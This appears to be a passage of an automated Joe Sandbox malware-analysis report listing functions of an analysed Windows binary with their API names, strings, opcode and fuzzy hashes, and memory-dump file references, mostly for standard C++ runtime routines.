                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                • API String ID: 3523768491-393685449
                                                                                                                                • Opcode ID: e612acec61e4d8f34becb406906a2f48129ca5cf95974f331aad295306a019f2
                                                                                                                                • Instruction ID: 6e883e7ef303218a7f3ee509f8a02f2218bb9d67e203ef3604b0c0f6f98ffe51
                                                                                                                                • Opcode Fuzzy Hash: e612acec61e4d8f34becb406906a2f48129ca5cf95974f331aad295306a019f2
                                                                                                                                • Instruction Fuzzy Hash: 2CE1D372908B828AEB10BF25D4882BEB7A0FB4A768F544135DF8D47659DF78E48DC710
                                                                                                                                Function 00007FF71277FE60 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32 ref: 00007FF71277FE6F
                                                                                                                                • SetLastError.KERNEL32 ref: 00007FF71277FE8E
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF71277FEB7
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF71277FEC8
                                                                                                                                • FlsSetValue.KERNEL32 ref: 00007FF71277FED9
                                                                                                                                  • Part of subcall function 00007FF712781270: HeapFree.KERNEL32(?,?,00007FF71277EB93,00007FF712787F3E,?,?,?,00007FF7127882BB,?,?,00000000,00007FF712788835,?,?,?,00007FF712788767), ref: 00007FF712781286
                                                                                                                                  • Part of subcall function 00007FF712781270: GetLastError.KERNEL32(?,?,00007FF71277EB93,00007FF712787F3E,?,?,?,00007FF7127882BB,?,?,00000000,00007FF712788835,?,?,?,00007FF712788767), ref: 00007FF712781290
                                                                                                                                • SetLastError.KERNEL32 ref: 00007FF71277FEFC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 365477584-0
                                                                                                                                • Opcode ID: 0d8aa393f2d17b8edfc8cfe5423c9b512c506ad1acb4a16cb7a6982c2fdc3c76
                                                                                                                                • Instruction ID: 1fb7b77305dc0f650b8b0b9da05e2f455104a53a645f34969eaa4d65f2340c01
                                                                                                                                • Opcode Fuzzy Hash: 0d8aa393f2d17b8edfc8cfe5423c9b512c506ad1acb4a16cb7a6982c2fdc3c76
                                                                                                                                • Instruction Fuzzy Hash: 81116020F08A4342FA14B725A80603F9251AF8F7B0FC44A34EA1E462D6DEACE84DC721
                                                                                                                                Function 00007FF712761B60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                • String ID: bad locale name
                                                                                                                                • API String ID: 2967684691-1405518554
                                                                                                                                • Opcode ID: f2b3e558d99c3bd8f288ca0473810a1cc744a51b678ff766b751621e3b4c577b
                                                                                                                                • Instruction ID: e19e88845c86346a79887fb5cb662b2dd6ce518de67dfb218230e4d8157156ef
                                                                                                                                • Opcode Fuzzy Hash: f2b3e558d99c3bd8f288ca0473810a1cc744a51b678ff766b751621e3b4c577b
                                                                                                                                • Instruction Fuzzy Hash: 73419D22B0AF4189FB10EFB0E4542BE63A0EF59758F844034DF4E26A55DEB8D51EE364
                                                                                                                                Function 00007FF712772160 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: Negative precision.$Number is too big.
                                                                                                                                • API String ID: 3237623162-3993994484
                                                                                                                                • Opcode ID: 1c8eeda72e458831a1f13c6a46e9a6da0929dd9a543c3f466b0eae3888ca776f
                                                                                                                                • Instruction ID: d3728257640c65a64996e2caba0004c74f68bbdc4bbbe26ae39ab7d7eaeacf47
                                                                                                                                • Opcode Fuzzy Hash: 1c8eeda72e458831a1f13c6a46e9a6da0929dd9a543c3f466b0eae3888ca776f
                                                                                                                                • Instruction Fuzzy Hash: 1421417390C68B4FE3067F7440190BF7B60BF6AB28FA58831D3A541883DD9D655DD264
                                                                                                                                Function 00007FF71277CED0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                • Opcode ID: 23a54dc8d6162c377fca0c19f557e3a0839a3094af474abfa26a091d8b68e313
                                                                                                                                • Instruction ID: 60d8fcb6c92f6390cc5275eea9313fdeeb1910367efdd469d34ff95b6770e9a8
                                                                                                                                • Opcode Fuzzy Hash: 23a54dc8d6162c377fca0c19f557e3a0839a3094af474abfa26a091d8b68e313
                                                                                                                                • Instruction Fuzzy Hash: 5BF01221A09E0282EA146B24A45977B9360AF4FB75FD40A39E76D452E4CFACD44DC720
                                                                                                                                Function 00007FF712763A60 Relevance: 7.9, APIs: 5, Instructions: 367COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Module$FileHandleName
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2566878671-0
                                                                                                                                • Opcode ID: 8a5630142ab7a5fe3b6d9a63da8698e6332b7e063a85ff4532495ae5f1f2b0a0
                                                                                                                                • Instruction ID: 31764982a6feae14bb55003619c86351833d0ac696d910a35264ecaa7fc5c117
                                                                                                                                • Opcode Fuzzy Hash: 8a5630142ab7a5fe3b6d9a63da8698e6332b7e063a85ff4532495ae5f1f2b0a0
                                                                                                                                • Instruction Fuzzy Hash: FCE19762B19E8281FE10AB25D04437AE391EB9ABB4FC45632E75D026D4DFBCE58CC714
                                                                                                                                Function 00007FF712775CE0 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustPointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                • Opcode ID: 4969339425971265b9ff7054e51a6a5678728dbd002be71af603e48de7f4eb68
                                                                                                                                • Instruction ID: 0a65a2b321eecf94fb44d8859379861d075d390a6bc19bec21560b46db9d3696
                                                                                                                                • Opcode Fuzzy Hash: 4969339425971265b9ff7054e51a6a5678728dbd002be71af603e48de7f4eb68
                                                                                                                                • Instruction Fuzzy Hash: 40B1A531A09F8281FA65BB11A48853BE290EF4EBA4F994435DF4D0B785DEECE44DC360
                                                                                                                                Function 00007FF71276FB10 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 333COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 4097890229-1689078516
                                                                                                                                • Opcode ID: 537daa8fa039e2fd7d7a426cad5110617e9acfdf2f4a9efe606bcd97b057bf70
                                                                                                                                • Instruction ID: 192cc26f1ea3f1df583dffb94ec2de0be9a0d22c64390529295b180d496a19c9
                                                                                                                                • Opcode Fuzzy Hash: 537daa8fa039e2fd7d7a426cad5110617e9acfdf2f4a9efe606bcd97b057bf70
                                                                                                                                • Instruction Fuzzy Hash: 9AE1C522A18F818AFB109B68D4402BEB7A1FB4A764FD04131DB5E13A99DFB8D44DC715
                                                                                                                                Function 00007FF712770210 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 4097890229-1689078516
                                                                                                                                • Opcode ID: 2a81cd6e82fbc0d0f36ed3fe78ed18649df4111d57f3f048927627af8d6163e6
                                                                                                                                • Instruction ID: b3a7e83aa5b1e4bf697cddec73ed623db02405d30259eb5ab6d02ce3194d32ca
                                                                                                                                • Opcode Fuzzy Hash: 2a81cd6e82fbc0d0f36ed3fe78ed18649df4111d57f3f048927627af8d6163e6
                                                                                                                                • Instruction Fuzzy Hash: B7E12726A18F9189EB11EB64D4483BEB7A0FB4A768F804135DB8D53A94DFBCD48DC710
                                                                                                                                Function 00007FF71276F670 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 327COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                • String ID: integral cannot be stored in wchar_t
                                                                                                                                • API String ID: 4097890229-1689078516
                                                                                                                                • Opcode ID: 1427d843f4aed5d308cb1e80176485806e2bc18b85755f29336377a07527ae5d
                                                                                                                                • Instruction ID: c21ff7ac7d548dee0bcf6c643fff523be98fa28eb205bc49d5acfffa1851bf5a
                                                                                                                                • Opcode Fuzzy Hash: 1427d843f4aed5d308cb1e80176485806e2bc18b85755f29336377a07527ae5d
                                                                                                                                • Instruction Fuzzy Hash: B8E1E622A18F8286FB109B68D4403BEB7A0FB4A764FD04131DB9E53A94DFB8D48DC715
                                                                                                                                Function 00007FF7127841AC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                • Opcode ID: 45395b0d96922527765d728b34f0564db099632d62bdb077479cf8bc79a1f4c5
                                                                                                                                • Instruction ID: 3348d89e8a7e9f15eaa397145fa8ffad047f9b457b93fa4b25f39c45f7a7b05f
                                                                                                                                • Opcode Fuzzy Hash: 45395b0d96922527765d728b34f0564db099632d62bdb077479cf8bc79a1f4c5
                                                                                                                                • Instruction Fuzzy Hash: 2E81F732D0CA0285F7647F25A12227BA6A0EB1BB68FD54039CB4D67695DFEDE40DC321
                                                                                                                                Function 00007FF712777054 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                • String ID: MOC$RCC
                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                • Opcode ID: b57ca0e4605b238f207969a4d6775e2ddebffe2bee4ca332d74a7a900d773b3f
                                                                                                                                • Instruction ID: 0160474b8e8c584e998b9748c75467c38a0655dd1f6d56437f65c4167b9371e3
                                                                                                                                • Opcode Fuzzy Hash: b57ca0e4605b238f207969a4d6775e2ddebffe2bee4ca332d74a7a900d773b3f
                                                                                                                                • Instruction Fuzzy Hash: 4D91D073A08B818AE750EB64E8442AEB7B0FB4A7A8F504139EF8C47755CF78D199C700
                                                                                                                                Function 00007FF71276CEC0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                • String ID: false$true
                                                                                                                                • API String ID: 3668304517-2658103896
                                                                                                                                • Opcode ID: 1d84cbfa4318233187c0dc2a796e371425faf289532cb1b36cbea29742da1837
                                                                                                                                • Instruction ID: 91e95674a0dd23002824913709c3b3616fc4571e80c59897621ec538bbb485c3
                                                                                                                                • Opcode Fuzzy Hash: 1d84cbfa4318233187c0dc2a796e371425faf289532cb1b36cbea29742da1837
                                                                                                                                • Instruction Fuzzy Hash: 7361BF62B08E4589FB00ABA9D0442ADB3B1AB4A774F804635DF5C27798EE78D58EC354
                                                                                                                                Function 00007FF7127756A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                • Opcode ID: 57083e70d1afa7b20f372f1cde8bdf442fc3087724e161c57bd257221ff647c2
                                                                                                                                • Instruction ID: b4ac8c96db1c5a9f9891c3f7fd6caf9cf96772ae81eb68c5176f14f05df6bf69
                                                                                                                                • Opcode Fuzzy Hash: 57083e70d1afa7b20f372f1cde8bdf442fc3087724e161c57bd257221ff647c2
                                                                                                                                • Instruction Fuzzy Hash: 2551B231A19A828BDB14FB15E44863AB391FB49BA4F944135DF4A47788DFBCE84DC710
                                                                                                                                Function 00007FF7127775D4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                • String ID: csm$csm
                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                • Opcode ID: 5c793aab23eec38271f8c7605626d84685e601824f318c1dfa0f80f2955c9ea4
                                                                                                                                • Instruction ID: d068bb3841da6dcf6947d7317e7b00202e7ceb456e86523f3cc59d354c3642e0
                                                                                                                                • Opcode Fuzzy Hash: 5c793aab23eec38271f8c7605626d84685e601824f318c1dfa0f80f2955c9ea4
                                                                                                                                • Instruction Fuzzy Hash: 6151D432A08B4286EB68BB25D44827AF7A0EB4ABA4F944135DB4C43785CFBCE45CC750
                                                                                                                                Function 00007FF712776DE4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                • String ID: MOC$RCC
                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                • Opcode ID: a5ef9be401f65829ae2f077cda814f790cefcec111a1a007bb95ec9fbea5e673
                                                                                                                                • Instruction ID: 02365a9e55cfe873c356df6f34f4e223b43d4c5a2724424d2d085991cc1331c5
                                                                                                                                • Opcode Fuzzy Hash: a5ef9be401f65829ae2f077cda814f790cefcec111a1a007bb95ec9fbea5e673
                                                                                                                                • Instruction Fuzzy Hash: 4A618532908BC585D761BB15E4443ABF7A0FB8A7A4F444225EB9C07B59DFBCE198CB10
                                                                                                                                Function 00007FF7127721AB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                • String ID: Negative precision.$Number is too big.
                                                                                                                                • API String ID: 909987262-3993994484
                                                                                                                                • Opcode ID: 1e8bf670a80ead57cba2636150351d364dd78a7ff077fd85631ce462de8c0439
                                                                                                                                • Instruction ID: 1818f654790770c993fb65ee7eece63fca700bfa3fbfca293323fa9fc3c9c417
                                                                                                                                • Opcode Fuzzy Hash: 1e8bf670a80ead57cba2636150351d364dd78a7ff077fd85631ce462de8c0439
                                                                                                                                • Instruction Fuzzy Hash: 86115E6390C68B4FF3063B7444190BFBB60BF6AB38FA58831D3A841883D99D655DD664
                                                                                                                                Function 00007FF712780558 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
